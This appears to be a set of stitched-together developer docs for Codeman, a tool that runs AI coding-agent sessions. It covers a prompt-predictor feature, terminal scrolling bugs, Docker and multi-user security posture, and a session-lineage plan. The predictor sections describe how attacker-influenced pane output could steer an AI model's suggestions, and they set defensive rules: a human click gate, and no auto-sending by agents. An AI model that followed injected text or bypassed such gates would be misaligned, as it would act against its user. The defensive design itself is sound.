Agent use cases this unlocks: a lead session records intentions as the user states them ("remember: shipping 1.16 is the goal"), and a returning user gets a prediction grounded in what the agent knew, not just raw prompt history.
## Security / privacy
- **The human gate is the injection mitigation**: pane output (attacker-influenceable) flows into the predictor, so its output is only ever *proposed*, rendered as text (`textContent`), and sent solely by an explicit user click. No auto-send path exists, including for the skill.
- Intent data: 0600 file, bounded fields, per-owner keys, endpoints ownership-checked, excluded from search, cleared via DELETE.
- Predictor spawns with the user's own credentials exactly like the AI idle/plan checkers; model name shell-validated the same way.
- Setting OFF stops capture immediately; existing data stays until DELETE (explicit, not silent).
-`test/readmymind-context.test.ts`: fixture scenarios pinning the assembled prompt: pending-dialog-first ordering, tail-keeping truncation of the assistant turn, budget drop order (siblings before workspace signals), remote-case git skip, trust-tier framing present, rejected suggestions included only on rethink.
-`test/readmymind-predictor.test.ts`: strict JSON parse, garbage output → error result, newline stripping, `kind` validation, rejected-suggestions threading into the prompt.
-`test/routes/readmymind-routes.test.ts` (`app.inject`): CRUD round-trip, predict with a stubbed predictor, 409 while in flight, non-claude 400, ownership 404, Send/Insert byte assertions via the test-PTY echo (`\r` present vs absent).
- Transcript capture: extend the transcript-watcher fixtures with user-turn entries.
## Phases
1.**Intent store + capture + intent endpoints + skill docs.** Immediately useful to agents even before any UI exists.
2.**Context assembler + predictor + predict endpoint + desktop button/modal.** The feature as pitched. The assembler ships with all collectors it can serve from day one (transcript, intent, git, run-summary, siblings); the approvals collector activates when PR #245 lands.
3.**Phone accessory key, rethink steering, alternates row.** Part 1 (shipped): the alternates row (tappable, swap into the field without losing edits; Rethink rejects the whole shown set), the phone 🧠 keyboard-accessory key (both bar templates, `rmm-enabled` marker class on the bar), and a phone-sized modal (small dialog, not full-screen). Part 2 (shipped): rethink steering, the free-text steer note under the suggestions, sent as `steer`, visible whenever Rethink is live (ready and empty-result phases), cleared on each open; the empty-result copy points at the note, and the footer buttons moved to the styled `btn-toolbar` convention (the bare `btn btn-*` classes they shipped with match no CSS in this codebase and rendered as unstyled UA buttons).
4. Explicitly later: proactive predict-on-idle (ghost suggestion chip), auto-compaction of `recentPrompts` into `goals` via a cheap model, codex/gemini capture, cross-case "global" intent.
## Open questions
- Should Rethink's rejected-suggestion memory persist across modal closes, or reset each open?
- Is a composer-adjacent placement (next to the toolbar Run controls) better than the header for discoverability?
- Pending-dialog input (source #1) consumes the approvals-inbox store (PR #245, merged): the phase-2 collector reads pending items directly from `src/approval-inbox.ts`.
Codeman's per-case memory of what you are trying to accomplish, and the 🧠 button that turns it into a predicted next prompt. Each case gets an **intent profile**: a freeform `goals` text (written by you or your agent) plus the prompts you actually submitted, captured automatically while the feature is on. Pressing 🧠 feeds that profile and the live session signals to a one-shot model call and shows the predicted prompt for you to send, edit, or rethink. Nothing is ever sent to a session automatically. Design doc: [`readmymind-plan.md`](readmymind-plan.md).
## What it does
- Captures the prompts you submit in Claude sessions into a per-case history (50 most recent, bounded).
- Lets you (or your agent) record explicit goals per case.
- Predicts your next prompt on demand (the 🧠 header button, or `POST .../readmymind` for agents): the suggestion arrives in a modal with Send / Insert / Rethink / Dismiss.
- Exposes the profile over the HTTP API, and to agents through the `codeman` skill, so an agent can ground its work in what you actually want instead of guessing from the last screenful.
## Turning it on
App Settings → Header & Panels → Cross-session features → **Read My Mind** (synced setting `readMyMindEnabled`, default **OFF**). It gates everything: capture, the header button, and nothing shows anywhere while it is off. The API equivalent:
```bash
curl -sk -X PUT https://localhost:3000/api/settings \
-H 'Content-Type: application/json'\
-d '{"readMyMindEnabled": true}'
```
Add `-u user:password` if your install has `CODEMAN_PASSWORD` set, and drop `-k`/use `http://` for a plain-HTTP dev server. Turning it OFF stops capture immediately; existing profiles stay until you delete them (below).
## The 🧠 button
On a Claude session, press the brain button in the header (desktop) or the 🧠 key on the keyboard accessory bar (phones and tablets; it appears when the setting is on). Codeman assembles everything it already knows: your goals, your recent prompts (with your voice: length, tone, shorthand), the tail of the last assistant reply, recent tool activity, git state (branch, dirty files, pending changesets), how long you have been away and what happened meanwhile, sibling sessions in the same case, and any dialog the session is currently waiting on. A one-shot model call (opus by default, `readMyMindModel` to override) turns that into 1-3 suggestions; the top one lands in an editable field with its rationale, and the others render as tappable alternate rows: tap one to swap it into the field (edits you already made are kept on the row you leave).
- **Send** submits it to the session (with Enter).
- **Insert** drops it on the CLI composer *without* Enter, so you can edit it in the terminal before sending.
- **Rethink** re-runs with everything shown (the field and the alternates) recorded as rejected. An optional steer note below the suggestions ("no, I meant the mobile bug") rides along as your own words, the highest-authority signal the predictor gets; it stays in the field across re-runs until you clear it or reopen the modal.
- **Dismiss** closes; nothing happens.
A prediction takes 5-90 seconds and costs real tokens; one runs per session at a time. If the session is sitting on a permission/question dialog, the suggestion is usually an answer to that dialog: that is intentional.
**Security note**: the prediction reads observable content (assistant output, tool logs, git output) which a hostile repo could try to steer. The predictor is told user-stated intent outranks anything observed, and, more importantly, a suggestion is only ever *proposed*: your click is the boundary. No auto-send path exists, including for agents.
## What gets captured, exactly
Capture reads the Claude session transcript, not your keystrokes: when a user turn lands in the transcript, its text is folded into the case's profile. Filters applied on the way in:
- **Claude-mode sessions only.** Shell, OpenCode, Codex, Gemini, Antigravity, and Pi sessions are never captured (they have no transcript watcher).
- Tool results, local slash-command echo (`/model` and friends), system wrappers, and interrupt markers are skipped.
- Entries shorter than 3 characters are skipped (menu digits, Esc artifacts).
- Consecutive duplicates collapse (auto-resume's "continue" spam counts once per run).
- Each prompt is stored as one line, truncated to 500 characters; the history caps at 50 prompts FIFO.
Because the transcript path arrives via Claude Code hooks, capture needs hooks to reach the server, the same condition as hook-based idle detection. Docker cases against a loopback-only server need `CODEMAN_DOCKER_BRIDGE_HOOKS=1`; remote-SSH cases do not capture.
## What is never captured
- Anything while `readMyMindEnabled` is OFF (capture is not retroactive).
- Terminal output, keystrokes, passwords typed into shells: only submitted Claude prompts are read.
- Nothing leaves the machine beyond the model call you explicitly trigger, and profiles are never fed into `/api/search`.
## Where it lives, and how to wipe it
Profiles live in `~/.codeman/intents.json`, written atomically at mode 0600 (captured prompts can contain secrets). The file is per Codeman instance. Keys derive from owner + the case's resolved working directory, so profiles survive `/clear`, respawn cycles, and session churn, and in multi-user mode two owners of the same directory get separate profiles.
Forget one case: `DELETE /api/sessions/:id/intent` (below). Forget everything: stop the server and delete `~/.codeman/intents.json`.
## The API
Four endpoints, session-scoped so ownership is enforced by the session itself (`/api/v1/` aliases work too; full spec in [`api-reference.md`](api-reference.md)):
A case with nothing recorded answers an empty profile with `updatedAt: 0`; reads never persist anything. Goals cap at 8192 characters and the schema is strict, so unknown fields or over-long goals answer `400 INVALID_INPUT`. A session you do not own answers `404 NOT_FOUND`, indistinguishable from a nonexistent one. Predict answers `{ suggestions: [{ prompt, why, kind }], durationMs }` (`kind`: `continue` / `verify` / `redirect`), `409 CONFLICT` while one is already running, `400 INVALID_INPUT` on non-claude sessions, and `502 OPERATION_FAILED` when the model produced no usable JSON. The rethink flow passes `{"steer":"…","rejected":["…"]}`.
## For agents (the skill)
The `codeman` agent skill documents the same verbs (SKILL.md §3 plus `reference/endpoints.md`), with the ground rules: read the profile to understand what the user wants, record goals the user actually stated, merge instead of blind-writing (PUT replaces), never delete a profile unprompted, and never send a predicted suggestion into a session unless the user asked. It is the user's memory, not the agent's.
## What comes next
Explicitly later: proactive predict-on-idle, auto-compaction of the prompt history into goals, non-Claude capture. See the phases section of [`readmymind-plan.md`](readmymind-plan.md).
## Troubleshooting
| Symptom | Cause / fix |
| ------- | ----------- |
| No 🧠 button in the header | `readMyMindEnabled` is OFF (App Settings → Header & Panels → Cross-session features), you are on a phone (there it is a key on the keyboard accessory bar instead, visible while typing), or the active session is not claude-mode |
| Prediction feels generic | The profile is thin: record goals (PUT or ask your agent to), and let capture accumulate a few real prompts first |
| "A prediction is already running" (409) | One per session at a time; wait for the current one (up to 90 s) |
| Prediction fails (502) | The model returned no usable JSON, or the CLI could not start; retry. Check `readMyMindModel` if you overrode it |
| Profile stays empty although I am prompting | `readMyMindEnabled` was OFF at the time (capture is not retroactive), the session is not claude-mode, or hooks are not reaching the server (Docker case on a loopback bind without `CODEMAN_DOCKER_BRIDGE_HOOKS=1`, or a remote-SSH case) |
| Short answers I typed are missing | Entries under 3 characters are filtered by design (menu digits, Esc artifacts) |
| My goals text vanished after an agent wrote to it | PUT replaces the whole text; the skill tells agents to read + merge, but a blind write wins. Re-state the goals; consider phrasing them in the session so capture keeps the evidence |
| Two profiles for what I think is one case | Different owners in multi-user mode, or genuinely different directories; paths are realpath-resolved, so symlink spellings converge but distinct checkouts do not |
| `400 INVALID_INPUT` on PUT | Goals over 8192 chars, or an extra field in the body (strict schema) |
## Where the code lives
`src/intent-store.ts` (store + pure helpers, singleton), the `transcript:user_prompt` event in `src/transcript-watcher.ts`, capture wiring in `src/web/server.ts` (`captureIntentPrompt`), context assembly in `src/readmymind-context.ts` (pure) + `src/readmymind-collectors.ts` (transcript tail + git IO), the predictor in `src/readmymind-predictor.ts`, routes in `src/web/routes/readmymind-routes.ts`, schemas in `src/web/schemas.ts`, frontend in `src/web/public/readmymind-ui.js`. Tests: `test/intent-store.test.ts`, `test/readmymind-context.test.ts`, `test/readmymind-collectors.test.ts`, `test/readmymind-predictor.test.ts`, `test/routes/readmymind-routes.test.ts`, and the capture cases in `test/transcript-watcher.test.ts`.
| `RemoteCase` | A working directory on a host: `name`, `type: 'remote'`, `hostId`, `remotePath`. |
| `SessionRemote` (extends `RemoteSshOptions`) | The resolved bundle stamped onto a live session: host coordinates + `remotePath` + `commands`, plus **`owned?`** and **`remoteSessionName?`** (COD-105 — see [Ownership](#ownership-launched-vs-discovered-and-attached-cod-105)). Built by `toSessionRemote(host, case)` (sets `owned: true`) for the launch path, or `toAttachedSessionRemote(host, name, path)` (sets `owned: false`) for the attach path. Both copy the advanced SSH options through so every connection is identical. |
| `RemoteCommandMode` | `Extract<SessionMode, 'shell' \| 'claude' \| 'opencode' \| 'codex' \| 'gemini' \| 'antigravity' \| 'pi' \| 'grok'>` — the modes that can run remotely. |
| `RemoteSessionInfo` (COD-105) | One discovered remote tmux session: `name` (always `codeman-*`), `attached` (a client is connected), `created` (epoch s), `windows`. Returned by `listRemoteCodemanSessions()`. |
Persistence is two flat JSON arrays in the instance data dir:
- **jonocodes** (author, 2026-08-03): SHELL session. Host Mac M4, brew tmux. On Android, touch-scrolling the terminal does nothing. On desktop, the mouse wheel cycles shell command history (acts like Up/Down arrows) instead of scrolling the screen.
- **mtiller** (comment, 2026-08-06): "similar issue just with scrolling backward to see agent output. This is with Firefox on MacOS." (Claude session implied.)
- **Reddit r/selfhosted** comment `p21x6ts` by mmtiller (= mtiller on GitHub): scrolling broken enough across phone/iPad/laptop that they fall back to Claude's own remote-control feature. Churn-risk user who otherwise loves the product; fixing this has promo value beyond the bug itself.
## How scrolling works today (read this before touching anything)
Three independent paths, all in `src/web/public/terminal-ui.js` unless noted:
1.**Desktop wheel** (container `wheel` listener, ~line 421): ALWAYS `preventDefault()`s, then either
- forwards synthetic SGR wheel reports to the app (`_sendSyntheticSgrWheel`, coalesced every 40ms, fire-and-forget) when `_shouldForwardWheelToApp(ev)` (~line 2823) passes: no Shift held, opt-out setting `terminalWheelLocalScrollback` off, xterm `mouseTrackingMode === 'none'`, session mode is `claude` with `cliVersion >= 2.1.187` or `codex`, and viewport is at bottom;
- otherwise scrolls xterm's LOCAL scrollback via `terminal.scrollLines(lines)`.
-`lines` comes from `_wheelScrollLines(ev)` (~line 2818): `delta / 25`, i.e. it assumes PIXEL deltas.
- NOTE: xterm.js's own internal wheel handler sits on an element INSIDE the container, so it runs FIRST (bubble order) and is not suppressed by the container's `preventDefault`.
2.**Touch** (touchstart/move/end, ~lines 441-585): converts touch deltas to `terminal.scrollLines()` with momentum. Touch is ALWAYS local-scrollback, never forwarded to the app. Tap-to-position (touchend, ~line 533) is separate and already handles both mouse-tracking-on and server-strip cases.
3.**Server-side strip** (`_handleTerminalOutput`, `src/session.ts:1384`): for modes in `isAltScreenStripMode()` (`src/session.ts:179` = `codex | claude | gemini`), strips alt-screen switches (`?47/?1047/?1049`), scrollback erase (`3J`), and mouse-tracking DECSETs (`?1000-?1007` except `?1004` focus) so content stays in xterm's normal buffer with scrollback intact. Includes a chunk-boundary carry so split sequences can't leak. `shell` and `opencode` (and `antigravity`) are deliberately EXCLUDED: arbitrary shell programs (vim/less/htop) legitimately need the alt screen. There is a parity copy of this strip on the replay path (`src/web/routes/session-routes.ts`, ~line 1697) and a frontend parity check `_sessionUsesServerMouseStrip()` (terminal-ui.js ~line 2751). All three must stay in sync.
4. Related: full-scrollback replay (`GET .../terminal?full=1` on first buffer load) fills xterm local scrollback; client scrollback is hardcoded 50k (`DEFAULT_SCROLLBACK`, constants.js) vs tmux 100k.
`_wheelScrollLines()` divides by 25 assuming `WheelEvent.deltaY` is pixels (`deltaMode === 0`, Chrome/Safari behavior). Firefox commonly fires `deltaMode === 1` (LINE units, deltaY around 1-3 per notch), so `Math.round(3/25) = 0` and the `|| ±1` fallback yields 1 line per event. With a discrete mouse wheel that is 1 line per notch: scrolling feels dead/broken. This hits BOTH the local-scroll path and the forwarded path, since both use the same function.
**Fix**: normalize by `ev.deltaMode` in `_wheelScrollLines()`:
-`deltaMode 0` (pixels): current behavior, `delta / 25`.
-`deltaMode 1` (lines): use the delta directly (round, keep sign fallback).
Keep the existing Shift-axis trap intact: on macOS trackpads Shift+two-finger scroll arrives as a HORIZONTAL wheel (deltaX carries the magnitude, deltaY ~0); that's why the function reads deltaX when Shift is held (issue #154). Don't lose it.
**Verify**: don't trust this diagnosis blindly. First reproduce in real Firefox on macOS and log `deltaMode`/`deltaY` (Firefox trackpad input can arrive as pixels; external mouse as lines). Also confirm the session's `cliVersion` probe succeeded (a failed probe disables forwarding entirely, which would point elsewhere). Unit-test by dispatching synthetic `WheelEvent`s with explicit `deltaMode` values; a Playwright `firefox` project pass is the end-to-end check.
### Bug B: shell mode has NO working scrollback at all (jonocodes)
Chain: shell mode is excluded from the alt-screen strip (correctly) → tmux attaches on the alternate screen → xterm's alt buffer has zero scrollback. Consequences:
- **Wheel**: xterm's own internal wheel handler runs first and, in the alt buffer, converts wheel ticks into Up/Down arrow keys (alternateScroll behavior). The shell receives arrows → command history cycles. That is jonocodes' exact desktop symptom. The container handler's `scrollLines()` afterwards is a no-op (no scrollback in alt buffer).
- **Touch**: the touch handler's `scrollLines()` is equally a no-op → "scrolling does nothing" on Android. Exact symptom two.
- The real history exists the whole time in tmux's 100k-line buffer; nothing exposes it.
- Server-side, set `mouse on` scoped to shell sessions' tmux sessions (`tmux set-option -t <session> mouse on` at create + on attach of recovered sessions). Do NOT set it globally on the socket: claude/codex/gemini sessions rely on the DECSET strip and must not change.
- What this buys, all natively: tmux enables mouse tracking on the outer terminal → xterm `mouseTrackingMode` goes non-none → the container handler stands down (line ~2830 check) and xterm's own encoder forwards wheel as SGR reports → tmux scrolls its OWN copy-mode history on wheel-up, auto-exits at bottom. The alt-scroll arrow conversion disappears too (tracking mode takes precedence). Desktop is fully fixed with no new endpoints.
- **Touch**: still needs one small client change: in the touchmove path, when the active session is `shell` AND `mouseTrackingMode !== 'none'`, convert accumulated lines to `_sendSyntheticSgrWheel(x, y, lines)` instead of `scrollLines()`. The 40ms coalescing already prevents the tmux process storm (each send is a tmux send-keys server-side; unbatched flicks would spawn dozens of processes: this constraint is documented at `_sendSyntheticSgrWheel`, do not bypass it).
- **Selection tradeoff to verify**: with tracking on, xterm hands drag events to tmux instead of doing local browser selection. Shift+drag still does local selection (xterm shift-override). Verify this UX on desktop before shipping; if it's unacceptable, fall back to approach (b).
- **Also verify**: vim/less/htop inside the shell still behave (they'll now receive real mouse events via tmux, generally an improvement); remote shell sessions run tmux on the REMOTE host (`tmux -L codeman-remote`) and need the same option set there if remote shells are in scope (fine to defer, note it in the changeset if skipped).
**Fallback approach (b), only if (a)'s selection tradeoff fails testing**: keep mouse off; when a shell session is in the alt buffer, have the client send scroll intents to a small server endpoint that drives `tmux copy-mode -e -t <pane>` + `send-keys -X -N <n> scroll-up/down`. Preserves selection semantics exactly, but needs a new endpoint, server-side batching, AND suppression of xterm's native alt-scroll arrow conversion (capture-phase wheel listener with `stopPropagation`, or `attachCustomWheelEventHandler` if the vendored xterm version has it). More moving parts; (a) should be tried first.
**Not acceptable**: adding `shell` to `isAltScreenStripMode()`. vim/less/htop need the alt screen; that exclusion is deliberate and documented.
### Bug C: mtiller's phone/iPad case — UNREPRODUCED, do not guess
Touch is always-local by design, and Claude sessions keep content in the normal buffer (strip), so touch scrollback "should" work there. Before coding anything: build a repro matrix (iPhone Safari / iPad Safari / Android Chrome × claude / shell) on the current release. Plausible candidates if it does reproduce: auto-scroll-to-bottom fighting user scrolls (`_noteTerminalUserScroll`, ~line 2004), or they were in shell sessions on mobile too (then Bug B covers it). Ask mtiller on #205 for session mode + Codeman version if the matrix comes up clean.
## Invariants the implementation MUST respect
- Shift+wheel always scrolls local scrollback; the trackpad Shift-axis handling from #154 stays.
- The `terminalWheelLocalScrollback` opt-out setting keeps working (pins plain wheel to local).
- The viewport-at-bottom gate stays: once the user scrolled up locally, wheel stays local until they return to bottom.
- 40ms SGR coalescing: never send per-event writes to the server.
- Strip parity triangle: `session.ts` live strip ↔ `session-routes.ts` replay strip ↔ `_sessionUsesServerMouseStrip()` in the frontend. If you touch mode lists, update all three.
- Don't add `opencode`/`antigravity` to any strip/forward list; their TUI wheel behavior is unverified (documented at `_shouldForwardWheelToApp`).
- The chunk-boundary sequence carry in `_handleTerminalOutput` must not be weakened.
## Testing (per repo rules)
-`npm test -- test/<file>.test.ts` only; never bare `npm test`. New test ports 3150+, never 3000.
- Browser-test traps (documented in CLAUDE.md Testing): drive input/scroll through real events (`page.mouse.wheel`, real touch), not app internals; headless Chromium reports `isTouchDevice()` false even with `hasTouch: true`; assert on real state (xterm viewport position, `tmux -L codeman capture-pane`), not HTTP 200.
- Shell-mode E2E: create a throwaway shell session, `seq 1 500`, then (1) wheel up on desktop shows earlier lines, not history cycling; (2) touch-scroll on a phone shows earlier lines; (3) `vim` + `less` still enter/leave the alt screen cleanly; (4) Shift+drag still selects text.
- Firefox E2E: Playwright `firefox` project, wheel over a Claude session's finished output, assert viewport moved more than 1 line per notch.
- End-to-end against the REAL environment before claiming done (standing user rule). w1/w2/w3 tmux sessions are the user's live sessions: never send input to them; create your own throwaway session and DELETE it by exact id when done.
## Related observation (not a reported bug, worth a look while in there)
The `claude --version` probe that feeds the forwarding gate runs only for local and docker sessions (`src/session.ts:1490` gates `!this._remote`; docker handled at :1507). Remote Claude sessions therefore never get `cliVersion` and silently keep local-only wheel. Harmless (local scrollback works) but inconsistent; cheap to fix by probing over ssh, or document as intended.
## Rollout
1. Bug A (deltaMode) is small and independent: can ship alone as a patch.
2. Bug B (shell scrollback) is the headline fix for #205: patch or minor per COM flow.
3. After deploy + verification: comment on #205 (what was fixed, what needs their retest), then reply to the Reddit comment `p21x6ts` with the release version. Both reporters gave environment details; address them specifically.
| 1 | xterm parked in the **alternate buffer** for the whole session, so there is no scrollback at all and the wheel is translated into Up/Down arrow keys | `shell`, `opencode`, `antigravity` | High | Reproduced end to end |
| 2 | **Bursty output silently destroys a screenful** of the browser's scrollback and adds ~1 row | all | High | Measured |
| 3 | **Tab switch collapses scrollback** to roughly one screen (`full=1` fires once per page load) | all | Medium | Measured |
| 4 | `deltaMode` is never read, so Firefox scrolls ~4x slower per notch | all, Firefox | Low | Static, needs reporter data |
| 5 | **Remote SSH Claude cases get no `claude --version` probe**, so wheel forwarding silently stays off (residual #154) | `claude` + remote | Medium | Static |
---
## Finding 1: shell / opencode / antigravity are stuck in xterm's alternate buffer
### Root cause
The local tmux **client** (the `tmux attach` that node-pty spawns) emits `smcup` as its very
Only devices on your tailnet can reach it; Tailscale handles identity. No app
password and no `0.0.0.0` bind required. (This is the maintainer's production
setup.)
The guided flow installs Tailscale if needed, walks through login and the
tailnet HTTPS-certificates toggle, and configures the equivalent of:
```bash
codeman web # binds 127.0.0.1:3000 (plain HTTP is fine here)
tailscale serve --bg 3000# HTTPS at https://<node>.<tailnet>.ts.net
```
Only devices on your tailnet can reach it; Tailscale handles identity and
terminates TLS with a real Let's Encrypt certificate (so PWA install and web
push work). No app password and no `0.0.0.0` bind required. (This is the
maintainer's production setup.) `CODEMAN_TAILSCALE=1` presets the choice for
automation; the installer never runs `tailscale serve reset` and never touches
serve mappings other than `443 -> Codeman's port`.
### B. Authenticated cloudflared tunnel + password
@@ -299,7 +312,7 @@ TOCTOU window.
| Route | Cap | Notes |
|-------|-----|-------|
| `file-content` | 10 MB | text preview |
| `file-raw` | 50 MB | inline MIME map; **`X-Content-Type-Options: nosniff` on all responses** |
| `file-raw` | 50 MB | inline MIME map; **`X-Content-Type-Options: nosniff` on all responses**; streamed, `Range`-aware (206 slices come from the same validated path, and the cap is checked before the range) |
@@ -471,7 +484,45 @@ production layout (`~/.codeman`, `-L codeman`, port 3000).
---
## 10. Quick reference
## 10. Docker container isolation
Docker cases (1.4.0) run a session inside a per‑case container instead of on the host. The security posture:
- **Hardened create flags, always** — `--cap-drop ALL`, `--security-opt no-new-privileges`, `--pids-limit` (fork‑bomb guard), `--memory` == `--memory-swap` (a real OOM cap), `--init`, and non‑root: `--user <hostUid>:0` on Linux (host uid → workspace files stay host‑owned; GID 0 keeps `$HOME` writable), `--userns=keep-id` on rootless Podman. **Never** `--privileged`, and **never** the docker socket — the pure builder in `docker-hosts.ts` cannot emit them and the schema cannot represent them.
- **Credentials never enter an image** — the convenient default bind‑mounts host cred dirs (`~/.claude`, `~/.codex`, `~/.gemini` — which also carries Antigravity's `antigravity-cli/` state — `~/.config/{gcloud,opencode}`, five seeded files from `~/.pi/agent`, and three from `~/.grok`) read‑write. Bind mounts are physically excluded from `docker commit`, so exported images are secret‑free. API‑key CLIs get their key as an exec‑time NAME‑ONLY `--env OPENAI_API_KEY` (no `=value`, no `ps` leak, never committed); a create‑time `-e` for a secret is never used. The **sealed** profile (`mountCredentials:false` + `network:none`) drops the host mounts; full‑image export is then refused (an in‑container login would ride the committed layer) unless a pre‑commit scrub is opted into.
- **Blast radius — accept it explicitly** — the convenient profile mounts an arbitrary host workspace RW plus the host credential dirs RW into a network‑enabled container, so container‑run agent code can read/modify those host trees and reach the network at once. Still a net improvement over today's on‑host `--dangerously-skip-permissions` execution; use the sealed profile for genuinely untrusted work.
- **Import is untrusted‑bundle‑safe** — `/api/docker-cases/import` validates the manifest + per‑member SHA‑256 before extraction, rejects absolute / `..` tar members (traversal guard), and re‑tags the loaded image into a quarantined namespace so it can never overwrite `codeman/agent:base` or a pre‑existing tag.
- **Host guard & the bridge‑hooks listener** — in‑container hook callbacks carry `Host: host.docker.internal` / `host.containers.internal`; both are on the always‑on host‑header allowlist (`DOCKER_HOST_GATEWAY_ALIASES`) and resolve to the host only from inside a container netns, so they are not a browser DNS‑rebinding surface. On a loopback‑only server, in‑container hooks are opt‑in via `CODEMAN_DOCKER_BRIDGE_HOOKS=1`, which binds a SECOND listener on the docker bridge gateway serving **only** the hook endpoints (every other path → `403`) into the same hook‑secret‑gated pipeline. The bridge is host‑internal (containers + host), not the LAN, so it does not widen network exposure; the hook secret is bind‑mounted read‑only and referenced by path.
- **Instance isolation** — every managed container is labeled `codeman.instance=<CODEMAN_INSTANCE>`; the boot reaper reaps orphans of its OWN instance only, so a beta never removes a prod container. The in‑container tmux socket (`-L codeman-docker`) + session name (`codeman-dkr-*`) deliberately fail a nested Codeman's discovery pattern.
Full feature guide: [`docker-cases.md`](docker-cases.md).
---
## 10a. Multi‑user mode (opt‑in)
`codeman web --multiuser` (or `CODEMAN_MULTIUSER=1`) turns on named users with individually scrypt‑hashed passwords in `~/.codeman/users.json` (mode 0600). OFF by default; when off, nothing here applies and behavior is byte‑identical to single‑user. Design + phase status: [`multi-user-plan.md`](multi-user-plan.md).
- **It is workspace separation, NOT a security boundary between users.** Every session still runs as the SAME OS account with agent code that can read the whole host. Any user can ask their agent to `cat` another user's files; the WEB layer enforces scoping, the AGENT layer cannot. Mitigations: give non‑admins the default `auto` permission mode (classifier‑guarded), pair users with **Docker cases** (container per case) for real isolation, or run separate Codeman instances under separate OS accounts. Stated loudly in the admin panel and the plan's threat model (section 2).
- **It strictly improves network posture.** It removes the single shared `CODEMAN_PASSWORD` and gives each person a revocable credential; a non‑loopback bind and the tunnel‑enable guard are satisfied by "multi‑user with ≥1 enabled user" without a shared password.
- **Auth is a parallel branch** (`middleware/auth.ts`) that leaves the single‑user path untouched: per‑user scrypt verify (`timingSafeEqual`, timing‑equalized against user enumeration), identity‑carrying cookies, a per‑username failure bucket (a botnet can't brute one account across IPs; one NATed user can't lock out the rest), and a `mustChangePassword` lockbox. The hook‑secret loopback bypass, host guard, and Origin/CSRF guard are unchanged (hooks authenticate the INSTANCE, not a user).
- **Ownership is enforced server‑side only** and fails closed: `req.authUser` (a synthetic admin in single‑user), `findSessionOrFail` returns NOT_FOUND (never 403) for a foreign session, list/SSE/WS/file‑preview/search all filter by `session.owner`, and SSE routing defaults session‑scoped events to their owner (unresolved owner → withheld). The load‑bearing rule is **non‑admin `workingDir` confinement**: a non‑admin's session/one‑shot working dir must realpath‑resolve inside `~/codeman-users/<name>/cases`, checked BEFORE any disk write.
- **Privileged actions are a one‑bit grant** (`canBypassPermissions`, default off): only granted users (and admins) get `--dangerously-skip-permissions` (others are silently downgraded to `--permission-mode auto`), shell‑mode sessions, cron `launchCommand`, and other CLIs' bypass flags. Machine‑level resources (remote/Docker host definitions, tunnel, self‑update, settings writes) are admin‑only.
- **Admin actions are audited** append‑only to `~/.codeman/admin-audit.jsonl` (acting admin, action, target, IP). Passwords set by an admin create/reset are one‑time (returned once, force change). Under Basic auth, `logout` only truly ends QR‑issued sessions — to lock someone out, disable the account or reset the password (a proper login form is a deferred Phase 6).
---
## 10b. Web tabs (dashboard proxy)
A saved dashboard URL renders as a tab, served through Codeman's own origin at `/webview/<capability>/`. User guide: [`web-tabs.md`](web-tabs.md). Three properties carry the security weight:
- **The proxy is exempt from cookie auth and the Origin/CSRF guard, and that is deliberate.** The iframe is sandboxed without `allow-same-origin`, so it is opaque‑origin: its requests are cross‑site, meaning the `SameSite=lax` session cookie is never attached and its writes and WS upgrades arrive with `Origin: null`. The credential is instead a 192‑bit capability in the path, minted only by an authenticated `POST /api/webviews/:id/open`, held in memory (a restart invalidates every one), rolling TTL, bound to the minting user, and granting nothing but "relay bytes to this one saved URL". ⚠️ **The Host allowlist is NOT bypassed**, so DNS‑rebinding protection is unaffected. A second `Referer`‑keyed form exists for root‑absolute assets and is the only exemption decided by a request‑supplied header, so it is fenced to safe methods on non‑`/api`, non‑`/ws`, non‑`/q` paths. Edges pinned by `test/webview-auth-exemption.test.ts`.
- **Sandboxed by default; `allow-same-origin` is an explicit per‑dashboard opt‑in.** A proxied page is same‑origin with Codeman, so without the sandbox its JavaScript could read the Codeman document and call the agent‑spawning API. ⚠️ In BOTH modes the `Authorization` header and the `codeman_session` cookie are stripped before the upstream request, because a trusted (same‑origin) frame makes the browser attach Codeman's own Basic‑auth credentials to every proxied request; forwarding them would hand `CODEMAN_PASSWORD` to the dashboard.
- **Not an open relay, and not a privilege boundary.** `resolveUpstreamUrl()` refuses anything leaving the saved origin, and cross‑origin redirects are handed back unchanged rather than followed. The proxy does reach whatever the SERVER can reach, which is not an escalation for someone who already commands `--dangerously-skip-permissions` agents, but in multi‑user mode it means a non‑admin's dashboard is fetched from the server's network position. Saved URLs are validated to plain http(s) with no embedded credentials, and there is deliberately **no magic‑link path**: terminal output can never create a webview (the mistake the attachment scanner had to be walled off from).
---
## 11. Quick reference
| Env / flag | Effect |
|------------|--------|
@@ -482,6 +533,8 @@ production layout (`~/.codeman`, `-L codeman`, port 3000).
| `--https` | Enable TLS (adds HSTS) |
| `CODEMAN_INSTANCE` | Scope tmux socket + data dir for isolation |
| `CODEMAN_GESTURE=1` | Make the gesture overlay available (widens CSP) |
| `CODEMAN_DOCKER_BRIDGE_HOOKS=1` | Serve the hook endpoints on the docker bridge gateway (host‑internal, hooks‑only, `403` elsewhere) so in‑container hooks reach a loopback‑bound server — see §10 |
| `CODEMAN_DOCKER_BRIDGE_HOST` | Override the bridge gateway IP the hooks listener binds (default: auto‑detect) |
**Audit log:** session lifecycle and server start are recorded in
# Session lineage lines (spawn lines between tabs)
**Goal:** when a session spawns another session (the `codeman` agent skill starting a
worker, or anything else that says who it is), draw the same kind of glowing connection
line the subagent windows already use, but **tab → tab**, so a glance at the strip shows
which tab spawned which.
Status: PLAN. Nothing implemented yet.
---
## 1. The blocking fact: no parent relationship exists today
There is no spawn-parent link between sessions anywhere in the codebase:
-`SessionState` (`src/types/session.ts:388`) has no `parentSessionId` / `spawnedBy` /
`createdBy`.
-`POST /api/quick-start` and `POST /api/sessions` record only `owner = ownerFor(req)`,
which is the multi-user **human**, not the calling session.
- The only parent links that do exist are `TeamConfig.leadSessionId` (agent teams) and
`subagent-parents.json` (a frontend **window-layout** store for subagent windows).
Neither says "session A spawned session B".
- Nothing in the HTTP request identifies the caller: an agent's spawn call is plain
`curl` from inside a tmux pane, so there is no socket-level identity to recover
(`SO_PEERCRED` needs a unix socket; the API is TCP).
So the caller has to **tell** us. It already knows its own id: every managed pane gets
`CODEMAN_SESSION_ID` exported by `session-cli-builder.ts` (and the skill's §0 preamble
already binds it to `$SELF`).
## 2. Wire format
Two ways in, because they serve different callers. Body wins when both are present.
| Where | Shape | Who uses it |
| --- | --- | --- |
| body field | `"parentSessionId": "<uuid>"` | anything hand-writing one create call |
